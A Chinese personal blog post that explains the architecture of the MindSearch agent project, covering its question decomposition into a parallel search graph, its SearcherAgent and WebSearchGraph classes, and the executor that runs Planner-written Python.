<!DOCTYPE html>
<html lang="chs" itemscope itemtype="http://schema.org/WebPage"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />

  <link rel="icon" href="../../../favicon.svg">

  <title>
  2025-07-17 拆解Agent项目：MindSearch - 徐慧志的个人博客
  </title>
  <meta name="description" content="最近开始整理 Agent 项目，打算了解一下项目背后的思路，拓宽一下视野。
项目地址：https://github.com/InternLM/MindSearch
这个项目的核心理念是让AI将复杂问题分解为多个子问题，并行搜索获取信息，最后综合所有信息给出完整答案。
项目架构
1. 核心组件结构
MindSearch/
├── mindsearch/           # 核心AI agent模块
│   ├── agent/           # 智能体实现
│   ├── app.py          # FastAPI后端服务
│   └── terminal.py     # 命令行接口
├── frontend/           # 前端界面
│   ├── React/         # React前端
│   ├── gradio_agentchatbot/  # Gradio组件
│   └── streamlit前端
└── docker/            # Docker部署工具
2. 技术栈

后端 : FastAPI &#43; Python
AI框架 : Lagent (基于InternLM)
前端 : React &#43; TypeScript &#43; Vite
UI组件 : Antd &#43; ReactFlow (用于可视化搜索图)
搜索引擎 : 支持多种搜索API (Bing, Google, DuckDuckGo等)

核心工作原理
1. MindSearch Agent (mindsearch_agent.py)
主要功能

问题分解 : 将复杂问题分解为多个可搜索的子问题
并行搜索 : 同时执行多个搜索任务
信息整合 : 将搜索结果整理成“参考资料”，再让大模型根据这些资料生成最终答案。
流式输出 : 实时返回搜索进度和结果

模块解析
前置类型和工具

AgentMessage, AgentStatusCode, ModelStatusCode
来自 lagent.schema，用来描述“对话中的一条消息”及其“状态码”。
GeneratorWithReturn
来自 lagent.utils，是一个“既能迭代又能在最后拿返回值”的生成器包装器。
这里用来执行 self.action.run(&hellip;)，既能实时产出中间消息，又能在结束时拿到完整的图数据。
ExecutionAction, WebSearchGraph
来自本地模块 .graph。

两个小工具函数

_update_ref(ref, ref2url, ptr)
把一段文字里的“[[数字]]”引用标记重新编号，并同步更新 ref2url。
举例：

ref  = &#34;根据 [[3]] 和 [[5]] 的结论...&#34;
ptr  = 7
输出 = &#34;根据 [[8]] 和 [[9]] 的结论...&#34; ，
并把 ref2url 中 3、5 对应的 url 映射到 8、9。
返回值：更新后的文本、更新后的 url 映射、本次新增了多少个引用。" /><meta name="generator" content="Hugo 0.135.0">
  <link rel="stylesheet" href="http://localhost:1313/css/styles.css" />
  
  

  
  <meta property="og:url" content="http://localhost:1313/chs/know_how/2025-07-17-%E6%8B%86%E8%A7%A3agent%E9%A1%B9%E7%9B%AEmindsearch/">
  <meta property="og:site_name" content="徐慧志的个人博客">
  <meta property="og:title" content="2025-07-17 拆解Agent项目：MindSearch">
  <meta property="og:description" content="最近开始整理 Agent 项目，打算了解一下项目背后的思路，拓宽一下视野。
项目地址：https://github.com/InternLM/MindSearch
这个项目的核心理念是让AI将复杂问题分解为多个子问题，并行搜索获取信息，最后综合所有信息给出完整答案。
项目架构 1. 核心组件结构 MindSearch/ ├── mindsearch/ # 核心AI agent模块 │ ├── agent/ # 智能体实现 │ ├── app.py # FastAPI后端服务 │ └── terminal.py # 命令行接口 ├── frontend/ # 前端界面 │ ├── React/ # React前端 │ ├── gradio_agentchatbot/ # Gradio组件 │ └── streamlit前端 └── docker/ # Docker部署工具 2. 技术栈 后端 : FastAPI &#43; Python AI框架 : Lagent (基于InternLM) 前端 : React &#43; TypeScript &#43; Vite UI组件 : Antd &#43; ReactFlow (用于可视化搜索图) 搜索引擎 : 支持多种搜索API (Bing, Google, DuckDuckGo等) 核心工作原理 1. MindSearch Agent (mindsearch_agent.py) 主要功能 问题分解 : 将复杂问题分解为多个可搜索的子问题 并行搜索 : 同时执行多个搜索任务 信息整合 : 将搜索结果整理成“参考资料”，再让大模型根据这些资料生成最终答案。 流式输出 : 实时返回搜索进度和结果 模块解析 前置类型和工具 AgentMessage, AgentStatusCode, ModelStatusCode 来自 lagent.schema，用来描述“对话中的一条消息”及其“状态码”。 GeneratorWithReturn 来自 lagent.utils，是一个“既能迭代又能在最后拿返回值”的生成器包装器。 这里用来执行 self.action.run(…)，既能实时产出中间消息，又能在结束时拿到完整的图数据。 ExecutionAction, WebSearchGraph 来自本地模块 .graph。 两个小工具函数 _update_ref(ref, ref2url, ptr) 把一段文字里的“[[数字]]”引用标记重新编号，并同步更新 ref2url。 举例： ref = &#34;根据 [[3]] 和 [[5]] 的结论...&#34; ptr = 7 输出 = &#34;根据 [[8]] 和 [[9]] 的结论...&#34; ， 并把 ref2url 中 3、5 对应的 url 映射到 8、9。 返回值：更新后的文本、更新后的 url 映射、本次新增了多少个引用。">
  <meta property="og:locale" content="chs">
  <meta property="og:type" content="article">
    <meta property="article:section" content="know_how">
    <meta property="article:published_time" content="2025-12-05T13:54:40+00:00">
    <meta property="article:modified_time" content="2025-12-05T13:54:40+00:00">
    <meta property="article:tag" content="Tech">

  
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="2025-07-17 拆解Agent项目：MindSearch">
  <meta name="twitter:description" content="最近开始整理 Agent 项目，打算了解一下项目背后的思路，拓宽一下视野。
项目地址：https://github.com/InternLM/MindSearch
这个项目的核心理念是让AI将复杂问题分解为多个子问题，并行搜索获取信息，最后综合所有信息给出完整答案。
项目架构 1. 核心组件结构 MindSearch/ ├── mindsearch/ # 核心AI agent模块 │ ├── agent/ # 智能体实现 │ ├── app.py # FastAPI后端服务 │ └── terminal.py # 命令行接口 ├── frontend/ # 前端界面 │ ├── React/ # React前端 │ ├── gradio_agentchatbot/ # Gradio组件 │ └── streamlit前端 └── docker/ # Docker部署工具 2. 技术栈 后端 : FastAPI &#43; Python AI框架 : Lagent (基于InternLM) 前端 : React &#43; TypeScript &#43; Vite UI组件 : Antd &#43; ReactFlow (用于可视化搜索图) 搜索引擎 : 支持多种搜索API (Bing, Google, DuckDuckGo等) 核心工作原理 1. MindSearch Agent (mindsearch_agent.py) 主要功能 问题分解 : 将复杂问题分解为多个可搜索的子问题 并行搜索 : 同时执行多个搜索任务 信息整合 : 将搜索结果整理成“参考资料”，再让大模型根据这些资料生成最终答案。 流式输出 : 实时返回搜索进度和结果 模块解析 前置类型和工具 AgentMessage, AgentStatusCode, ModelStatusCode 来自 lagent.schema，用来描述“对话中的一条消息”及其“状态码”。 GeneratorWithReturn 来自 lagent.utils，是一个“既能迭代又能在最后拿返回值”的生成器包装器。 这里用来执行 self.action.run(…)，既能实时产出中间消息，又能在结束时拿到完整的图数据。 ExecutionAction, WebSearchGraph 来自本地模块 .graph。 两个小工具函数 _update_ref(ref, ref2url, ptr) 把一段文字里的“[[数字]]”引用标记重新编号，并同步更新 ref2url。 举例： ref = &#34;根据 [[3]] 和 [[5]] 的结论...&#34; ptr = 7 输出 = &#34;根据 [[8]] 和 [[9]] 的结论...&#34; ， 并把 ref2url 中 3、5 对应的 url 映射到 8、9。 返回值：更新后的文本、更新后的 url 映射、本次新增了多少个引用。">

  
  <meta itemprop="name" content="2025-07-17 拆解Agent项目：MindSearch">
  <meta itemprop="description" content="最近开始整理 Agent 项目，打算了解一下项目背后的思路，拓宽一下视野。
项目地址：https://github.com/InternLM/MindSearch
这个项目的核心理念是让AI将复杂问题分解为多个子问题，并行搜索获取信息，最后综合所有信息给出完整答案。
项目架构 1. 核心组件结构 MindSearch/ ├── mindsearch/ # 核心AI agent模块 │ ├── agent/ # 智能体实现 │ ├── app.py # FastAPI后端服务 │ └── terminal.py # 命令行接口 ├── frontend/ # 前端界面 │ ├── React/ # React前端 │ ├── gradio_agentchatbot/ # Gradio组件 │ └── streamlit前端 └── docker/ # Docker部署工具 2. 技术栈 后端 : FastAPI &#43; Python AI框架 : Lagent (基于InternLM) 前端 : React &#43; TypeScript &#43; Vite UI组件 : Antd &#43; ReactFlow (用于可视化搜索图) 搜索引擎 : 支持多种搜索API (Bing, Google, DuckDuckGo等) 核心工作原理 1. MindSearch Agent (mindsearch_agent.py) 主要功能 问题分解 : 将复杂问题分解为多个可搜索的子问题 并行搜索 : 同时执行多个搜索任务 信息整合 : 将搜索结果整理成“参考资料”，再让大模型根据这些资料生成最终答案。 流式输出 : 实时返回搜索进度和结果 模块解析 前置类型和工具 AgentMessage, AgentStatusCode, ModelStatusCode 来自 lagent.schema，用来描述“对话中的一条消息”及其“状态码”。 GeneratorWithReturn 来自 lagent.utils，是一个“既能迭代又能在最后拿返回值”的生成器包装器。 这里用来执行 self.action.run(…)，既能实时产出中间消息，又能在结束时拿到完整的图数据。 ExecutionAction, WebSearchGraph 来自本地模块 .graph。 两个小工具函数 _update_ref(ref, ref2url, ptr) 把一段文字里的“[[数字]]”引用标记重新编号，并同步更新 ref2url。 举例： ref = &#34;根据 [[3]] 和 [[5]] 的结论...&#34; ptr = 7 输出 = &#34;根据 [[8]] 和 [[9]] 的结论...&#34; ， 并把 ref2url 中 3、5 对应的 url 映射到 8、9。 返回值：更新后的文本、更新后的 url 映射、本次新增了多少个引用。">
  <meta itemprop="datePublished" content="2025-12-05T13:54:40+00:00">
  <meta itemprop="dateModified" content="2025-12-05T13:54:40+00:00">
  <meta itemprop="wordCount" content="704">
  <meta itemprop="keywords" content="Tech">

  
  <meta name="lang" content="chs" />
  

  
</head>
<body class="dark:bg-gray-800 dark:text-white relative flex flex-col min-h-screen"><header class="container flex justify-between md:justify-between gap-4 flex-wrap p-6 mx-auto relative">
  <a href="http://localhost:1313/chs/" class="capitalize font-extrabold text-2xl">
    
    <img src="../../../blist-logo.png" alt="徐慧志的个人博客" class="h-8 max-w-full" />
    
  </a>
  <button class="mobile-menu-button md:hidden">
    <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
      <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
      <line x1="4" y1="8" x2="20" y2="8" />
      <line x1="4" y1="16" x2="20" y2="16" />
    </svg>
  </button>
  <ul class="mobile-menu absolute z-10 px-6 pb-6 md:p-0 top-full left-0 w-full md:w-auto md:relative hidden md:flex flex-col md:flex-row items-end md:items-center gap-4 lg:gap-6 bg-white dark:bg-gray-800">

    
    <li><a href="../../../chs/know_how/">技术</a></li>
    
    <li><a href="../../../chs/life/">生活见闻</a></li>
    
    <li><a href="../../../chs/page/about/">关于</a></li>
    
    <li><a href="../../../chs/link/">宝藏集结</a></li>
    
    <li><a href="../../../chs/tags/">分类</a></li>
    

    
    
    <li class="relative cursor-pointer">
      <span class="language-switcher flex items-center gap-2">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24"
          stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
          <path stroke="none" d="M0 0h24v24H0z" fill="none" />
          <circle cx="12" cy="12" r="9" />
          <line x1="3.6" y1="9" x2="20.4" y2="9" />
          <line x1="3.6" y1="15" x2="20.4" y2="15" />
          <path d="M11.5 3a17 17 0 0 0 0 18" />
          <path d="M12.5 3a17 17 0 0 1 0 18" />
        </svg>
        <a>语言</a>
        <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14"
          viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round"
          stroke-linejoin="round">
          <path stroke="none" d="M0 0h24v24H0z" fill="none" />
          <path d="M18 15l-6 -6l-6 6h12" transform="rotate(180 12 12)" />
        </svg>
      </span>
      <div
        class="language-dropdown absolute top-full mt-2 left-0 flex-col gap-2 bg-gray-100 dark:bg-gray-900 dark:text-white z-10 hidden">
        
        
        
        
        <a class="px-3 py-2 hover:bg-gray-200 dark:hover:bg-gray-700" href="../../../en/" lang="en">English</a>
        
        
        
        <a class="px-3 py-2 hover:bg-gray-200 dark:hover:bg-gray-700" href="../../../de/" lang="de">Deutsch</a>
        
        
      </div>
    </li>
    
    

    
    <li class="grid place-items-center">
      <span class="open-search inline-block cursor-pointer">
        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" stroke-width="1.5"
          stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
          <path stroke="none" d="M0 0h24v24H0z" fill="none" />
          <circle cx="10" cy="10" r="7" />
          <line x1="21" y1="21" x2="15" y2="15" />
        </svg>
      </span>
    </li>
    

    
    <li class="grid place-items-center">
      <span class="toggle-dark-mode inline-block cursor-pointer">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" stroke-width="1.5"
          stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
          <path stroke="none" d="M0 0h24v24H0z" fill="none" />
          <circle cx="12" cy="12" r="3" />
          <line x1="12" y1="5" x2="12" y2="5.01" />
          <line x1="17" y1="7" x2="17" y2="7.01" />
          <line x1="19" y1="12" x2="19" y2="12.01" />
          <line x1="17" y1="17" x2="17" y2="17.01" />
          <line x1="12" y1="19" x2="12" y2="19.01" />
          <line x1="7" y1="17" x2="7" y2="17.01" />
          <line x1="5" y1="12" x2="5" y2="12.01" />
          <line x1="7" y1="7" x2="7" y2="7.01" />
        </svg>
      </span>
    </li>
    
  </ul>
</header>
<main class="flex-1">
  
  

  

  <article class="prose lg:prose-lg mx-auto my-8 dark:prose-dark px-4">

    <h1 class="text-2xl font-bold mb-2">2025-07-17 拆解Agent项目：MindSearch</h1>
    
    <h5 class="text-sm flex items-center flex-wrap">
      <svg xmlns="http://www.w3.org/2000/svg" class="mr-1" width="16" height="16" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
        <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
        <rect x="4" y="5" width="16" height="16" rx="2" />
        <line x1="16" y1="3" x2="16" y2="7" />
        <line x1="8" y1="3" x2="8" y2="7" />
        <line x1="4" y1="11" x2="20" y2="11" />
        <rect x="8" y="15" width="2" height="2" />
      </svg>
      发布于 
  
    2025年12月05日
  

      
        &nbsp;&bull;&nbsp;
      
      <svg xmlns="http://www.w3.org/2000/svg" class="mr-1" width="16" height="16" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
        <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
        <circle cx="12" cy="12" r="9" />
        <polyline points="12 7 12 12 15 15" />
      </svg>
     4&nbsp;分钟
     
      &nbsp;&bull;
      <svg xmlns="http://www.w3.org/2000/svg" class="mx-1" width="16" height="16" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
        <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
        <path d="M3 19a9 9 0 0 1 9 0a9 9 0 0 1 9 0" />
        <path d="M3 6a9 9 0 0 1 9 0a9 9 0 0 1 9 0" />
        <line x1="3" y1="6" x2="3" y2="19" />
        <line x1="12" y1="6" x2="12" y2="19" />
        <line x1="21" y1="6" x2="21" y2="19" />
      </svg>
      704&nbsp;字

    </h5>
    

    <details id="TableOfContents" class="px-4 mt-4 bg-gray-100 dark:bg-gray-700 rounded toc">
    <summary class="flex items-center font-bold py-2 px-4 cursor-pointer justify-between select-none text-black dark:text-white">
      <span>Table of contents</span>
      <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-chevron-down" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
        <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
        <polyline points="6 9 12 15 18 9"></polyline>
     </svg>
    </summary>

    <ul class="mt-2 pb-4">
        

        
        <li>
        <a href="#%e9%a1%b9%e7%9b%ae%e6%9e%b6%e6%9e%84">项目架构</a>
        

        
        <ul>
            <li>
        <a href="#1-%e6%a0%b8%e5%bf%83%e7%bb%84%e4%bb%b6%e7%bb%93%e6%9e%84">1. 核心组件结构</a>
        

        
        </li><li>
        <a href="#2-%e6%8a%80%e6%9c%af%e6%a0%88">2. 技术栈</a>
        

        
        </li></ul>
      </li><li>
        <a href="#%e6%a0%b8%e5%bf%83%e5%b7%a5%e4%bd%9c%e5%8e%9f%e7%90%86">核心工作原理</a>
        

        
        <ul>
            <li>
        <a href="#1-mindsearch-agent-mindsearch_agentpy">1. MindSearch Agent (mindsearch_agent.py)</a>
        

        
        <ul>
            <li>
        <a href="#%e4%b8%bb%e8%a6%81%e5%8a%9f%e8%83%bd">主要功能</a>
        

        
        </li><li>
        <a href="#%e6%a8%a1%e5%9d%97%e8%a7%a3%e6%9e%90">模块解析</a>
        

        
        </li><li>
        <a href="#%e5%89%8d%e7%bd%ae%e7%b1%bb%e5%9e%8b%e5%92%8c%e5%b7%a5%e5%85%b7">前置类型和工具</a>
        

        
        </li><li>
        <a href="#%e4%b8%a4%e4%b8%aa%e5%b0%8f%e5%b7%a5%e5%85%b7%e5%87%bd%e6%95%b0">两个小工具函数</a>
        

        
        </li><li>
        <a href="#%e4%b8%bb%e7%b1%bbmindsearchagent">主类：MindSearchAgent</a>
        

        
        </li></ul>
      </li><li>
        <a href="#2-mindsearch-enginegraphpy">2. MindSearch Engine(graph.py)</a>
        

        
        <ul>
            <li>
        <a href="#%e4%b8%bb%e8%a6%81%e5%8a%9f%e8%83%bd-1">主要功能</a>
        

        
        </li><li>
        <a href="#%e6%a8%a1%e5%9d%97%e8%a7%a3%e6%9e%90-1">模块解析</a>
        

        
        </li><li>
        <a href="#searcheragent">SearcherAgent</a>
        

        
        </li><li>
        <a href="#websearchgraph%e5%8f%af%e5%b9%b6%e5%8f%91%e7%9a%84%e6%90%9c%e7%b4%a2%e5%9b%be">WebSearchGraph——可并发的搜索图</a>
        

        
        </li><li>
        <a href="#executionactionplanner-%e7%9a%84%e6%89%a7%e8%a1%8c%e5%99%a8">ExecutionAction——Planner 的“执行器”</a>
        

        
        </li><li>
        <a href="#%e6%b5%81%e7%a8%8b">流程</a>
        

        
        </li></ul>
      </li><li>
        <a href="#3-mindsearch-promptmindsearch_promptpy">3. MindSearch Prompt(mindsearch_prompt.py)</a>
        

        
        <ul>
            <li>
        <a href="#planner-%e7%9a%84%e5%b7%a5%e4%bd%9c%e6%b5%81%e7%a8%8bgraph_prompt">Planner 的工作流程（GRAPH_PROMPT）</a>
        

        
        </li><li>
        <a href="#searcher-%e7%9a%84%e5%b7%a5%e4%bd%9c%e6%b5%81%e7%a8%8bsearcher_system_prompt">Searcher 的工作流程（searcher_system_prompt）</a>
        

        
        </li><li>
        <a href="#%e6%a8%a1%e6%9d%bf%e5%8f%98%e9%87%8f%e5%a6%82%e4%b8%8b">模板变量如下</a>
        

        
        </li><li>
        <a href="#%e6%b5%81%e7%a8%8b-1">流程</a>
        

        
        </li></ul>
      </li></ul>
      </li><li>
        <a href="#%e5%8f%af%e4%bb%a5%e6%94%b9%e8%bf%9b%e7%9a%84%e5%9c%b0%e6%96%b9">可以改进的地方</a>
        

        
        <ul>
            <ul>
            <li>
        <a href="#1-exec%e7%9a%84%e4%bd%bf%e7%94%a8%e4%bc%9a%e5%b8%a6%e6%9d%a5%e5%ae%89%e5%85%a8%e9%97%ae%e9%a2%98">1. exec的使用会带来安全问题</a>
        

        
        </li><li>
        <a href="#2-%e4%bb%a3%e7%a0%81%e6%8f%90%e5%8f%96%e6%9c%ba%e5%88%b6%e4%b8%8d%e5%a4%9f%e5%ae%89%e5%85%a8">2. 代码提取机制不够安全</a>
        

        
        </li><li>
        <a href="#3-%e7%bc%ba%e4%b9%8f%e4%bb%a3%e7%a0%81%e6%b2%99%e7%ae%b1">3. 缺乏代码沙箱</a>
        

        
        </li><li>
        <a href="#4-%e6%bd%9c%e5%9c%a8%e7%9a%84%e6%b3%a8%e5%85%a5%e6%94%bb%e5%87%bb">4. 潜在的注入攻击</a>
        

        
        </li></ul>
          <li>
        <a href="#%e6%9b%bf%e4%bb%a3%e6%96%b9%e6%a1%88">替代方案</a>
        

        
        </li></ul>
      </li><li>
        <a href="#%e5%85%b6%e4%bb%96">其他</a>
        

        
        <ul>
            <li>
        <a href="#%e5%9b%be%e7%9a%84%e6%a6%82%e5%bf%b5">图的概念</a>
        </li></ul>
    </li></ul>
  </details>

    <p>最近开始整理 Agent 项目，打算了解一下项目背后的思路，拓宽一下视野。</p>
<p>项目地址：https://github.com/InternLM/MindSearch</p>
<p>这个项目的核心理念是让AI将复杂问题分解为多个子问题，并行搜索获取信息，最后综合所有信息给出完整答案。</p>
<h1 id="项目架构">项目架构</h1>
<h2 id="1-核心组件结构">1. 核心组件结构</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>MindSearch/
</span></span><span style="display:flex;"><span>├── mindsearch/           # 核心AI agent模块
</span></span><span style="display:flex;"><span>│   ├── agent/           # 智能体实现
</span></span><span style="display:flex;"><span>│   ├── app.py          # FastAPI后端服务
</span></span><span style="display:flex;"><span>│   └── terminal.py     # 命令行接口
</span></span><span style="display:flex;"><span>├── frontend/           # 前端界面
</span></span><span style="display:flex;"><span>│   ├── React/         # React前端
</span></span><span style="display:flex;"><span>│   ├── gradio_agentchatbot/  # Gradio组件
</span></span><span style="display:flex;"><span>│   └── streamlit前端
</span></span><span style="display:flex;"><span>└── docker/            # Docker部署工具
</span></span></code></pre></div><h2 id="2-技术栈">2. 技术栈</h2>
<ul>
<li>后端 : FastAPI + Python</li>
<li>AI框架 : Lagent (基于InternLM)</li>
<li>前端 : React + TypeScript + Vite</li>
<li>UI组件 : Antd + ReactFlow (用于可视化搜索图)</li>
<li>搜索引擎 : 支持多种搜索API (Bing, Google, DuckDuckGo等)</li>
</ul>
<h1 id="核心工作原理">核心工作原理</h1>
<h2 id="1-mindsearch-agent-mindsearch_agentpy">1. MindSearch Agent (mindsearch_agent.py)</h2>
<h3 id="主要功能">主要功能</h3>
<ul>
<li>问题分解 : 将复杂问题分解为多个可搜索的子问题</li>
<li>并行搜索 : 同时执行多个搜索任务</li>
<li>信息整合 : 将搜索结果整理成“参考资料”，再让大模型根据这些资料生成最终答案。</li>
<li>流式输出 : 实时返回搜索进度和结果</li>
</ul>
<h3 id="模块解析">模块解析</h3>
<h3 id="前置类型和工具">前置类型和工具</h3>
<ol>
<li>AgentMessage, AgentStatusCode, ModelStatusCode
来自 lagent.schema，用来描述“对话中的一条消息”及其“状态码”。</li>
<li>GeneratorWithReturn
来自 lagent.utils，是一个“既能迭代又能在最后拿返回值”的生成器包装器。
这里用来执行 self.action.run(&hellip;)，既能实时产出中间消息，又能在结束时拿到完整的图数据。</li>
<li>ExecutionAction, WebSearchGraph
来自本地模块 .graph。</li>
</ol>
<h3 id="两个小工具函数">两个小工具函数</h3>
<ol>
<li>_update_ref(ref, ref2url, ptr)
把一段文字里的“[[数字]]”引用标记重新编号，并同步更新 ref2url。
举例：</li>
</ol>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>ref  = &#34;根据 [[3]] 和 [[5]] 的结论...&#34;
</span></span><span style="display:flex;"><span>ptr  = 7
</span></span><span style="display:flex;"><span>输出 = &#34;根据 [[8]] 和 [[9]] 的结论...&#34; ，
</span></span><span style="display:flex;"><span>并把 ref2url 中 3、5 对应的 url 映射到 8、9。
</span></span></code></pre></div><p>返回值：更新后的文本、更新后的 url 映射、本次新增了多少个引用。</p>
<ol>
<li>_generate_references_from_graph(graph)
把搜索图里每个节点（子问题）的结果拼成一段“参考资料”文本和 url 映射字典。
每个节点只取 memory 中第 3 条消息（索引=2）的内容作为搜索结果，因为那里固定是 ActionExecutor 返回的 json 字符串：{ref_id: url}。</li>
</ol>
<h3 id="主类mindsearchagent">主类：MindSearchAgent</h3>
<ol>
<li>构造函数</li>
<li>forward(message, session_id=0, **kwargs)
这就是“入口函数”，调用方每发一个用户消息就进来一次。整体流程：</li>
</ol>
<h2 id="2-mindsearch-enginegraphpy">2. MindSearch Engine(graph.py)</h2>
<h3 id="主要功能-1">主要功能</h3>
<p>这段代码有两个功能：</p>
<ol>
<li>把“搜索子问题”真正扔到后台去跑（WebSearchGraph）。</li>
<li>让 Planner 写的 Python 代码能调用这张图（ExecutionAction）。</li>
</ol>
<h3 id="模块解析-1">模块解析</h3>
<h3 id="searcheragent">SearcherAgent</h3>
<p>作用：把单个子问题包装成一条完整 prompt，送给大模型 + 搜索插件。</p>
<ul>
<li>只负责“一个问题”的搜索，不拆问题，也不建图。</li>
<li>与 Planner 的分工：Planner 决定“问什么”，SearcherAgent 负责“怎么搜”。
模板拼接逻辑</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>message = user_input_template.format(question=..., topic=...)
</span></span><span style="display:flex;"><span>↓
</span></span><span style="display:flex;"><span>如果 history 有值，再把历史 QA 用 user_context_template 贴到前面
</span></span><span style="display:flex;"><span>↓
</span></span><span style="display:flex;"><span>交给父类 StreamingAgentForInternLM / AsyncStreamingAgentForInternLM 进行流式对话
</span></span></code></pre></div><p>父类（StreamingAgentForInternLM）会：</p>
<ul>
<li>调用搜索插件 FastWebBrowser</li>
<li>逐句 yield 搜索结果</li>
<li>结束时把整条回答放进 response 字段，把对话记忆放进 memory 字段。</li>
</ul>
<h3 id="websearchgraph可并发的搜索图">WebSearchGraph——可并发的搜索图</h3>
<p>数据结构</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>nodes: dict[str, dict]      # 节点信息（内容 / 类型 / 回答 / 记忆）
</span></span><span style="display:flex;"><span>adjacency_list: dict[str, list[dict]]  # 边，带 state 1/2/3（进行中/未开始/已结束）
</span></span><span style="display:flex;"><span>future_to_query: dict[Future, str]     # 正在跑的后台任务
</span></span><span style="display:flex;"><span>searcher_resp_queue: Queue # 生产者-消费者队列，给ExecutionAction 用
</span></span><span style="display:flex;"><span>executor: ThreadPoolExecutor           # 线程池（同步模式）
</span></span></code></pre></div><p>类变量</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>is_async           # 是否启用 asyncio
</span></span><span style="display:flex;"><span>SEARCHER_CONFIG    # SearcherAgent 的初始化参数
</span></span><span style="display:flex;"><span>_SEARCHER_LOOP     # asyncio 事件循环列表（async 模式）
</span></span><span style="display:flex;"><span>_SEARCHER_THREAD   # 每个 loop 对应的后台线程
</span></span></code></pre></div><p>关键方法</p>
<ol>
<li>add_root_node
单纯记录根节点，无搜索。</li>
<li>add_node(node_name, node_content)</li>
<li>add_edge(start, end)
加边，并立即往队列 put 一条 (start_node, node_info, adjacency_list) 供前端更新 UI。</li>
<li>add_response_node
标记结束节点，同样 put 一条消息。</li>
<li>reset
清空图。</li>
<li>start_loop(n)（类方法）
当 is_async=True 时，提前在后台开 n 个线程，每个线程跑一个独立 asyncio loop，供 add_node 随时投异步任务。</li>
</ol>
<h3 id="executionactionplanner-的执行器">ExecutionAction——Planner 的“执行器”</h3>
<p>Planner 会生成一段 Python 代码，形如：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>graph = WebSearchGraph()
</span></span><span style="display:flex;"><span>graph.add_root_node(&#34;哪家大模型API最便宜？&#34;)
</span></span><span style="display:flex;"><span>graph.add_node(&#34;大模型API提供商&#34;, &#34;目前有哪些主要的大模型API提供商？&#34;)
</span></span><span style="display:flex;"><span>graph.add_node(&#34;OpenAI价格&#34;, &#34;OpenAI 的 GPT-4 最新价格是多少？&#34;)
</span></span><span style="display:flex;"><span>graph.add_edge(&#34;root&#34;,&#34;大模型API提供商&#34;)
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>graph.node(&#34;大模型API提供商&#34;)
</span></span></code></pre></div><p>ExecutionAction 负责：</p>
<ol>
<li>extract_code：
把 Planner 返回的 markdown 里 python <code> 或</code> 中的代码抠出来。</li>
<li>exec：
在传入的 global / local 命名空间里跑这段代码，于是 graph 对象就在 local_dict 里生成了。</li>
<li>消费队列：
只要 n_active_tasks &gt; 0，就不断从 searcher_resp_queue 取结果：</li>
<li>当所有任务完成后，把代码里出现的 graph.node(&hellip;) 对应的节点信息收集起来，返回 (res, graph.nodes, graph.adjacency_list) 给 Planner 做下一步决策或生成最终答案。</li>
</ol>
<h3 id="流程">流程</h3>
<ol>
<li>Planner 生成代码 → graph.add_node(&ldquo;xxx&rdquo;, &ldquo;子问题&rdquo;)</li>
<li>WebSearchGraph 启动 SearcherAgent</li>
<li>SearcherAgent.forward → 父类 StreamingAgentForInternLM</li>
<li>父类让大模型写 &lt;|plugin|&gt;{&ldquo;name&rdquo;:&ldquo;FastWebBrowser.search&rdquo;,&hellip;}</li>
<li>父类解析 JSON → 调用 FastWebBrowser.search → 逐句 yield 搜索结果</li>
<li>最终结果写进 node[&ldquo;response&rdquo;] 和 node[&ldquo;memory&rdquo;]
WebSearchGraph 通过 SearcherAgent 把每个子问题真正搜索完成。
ExecutionAction 负责把实时结果流回 Planner。
Planner 再根据结果决定继续拆问题还是直接汇总。</li>
</ol>
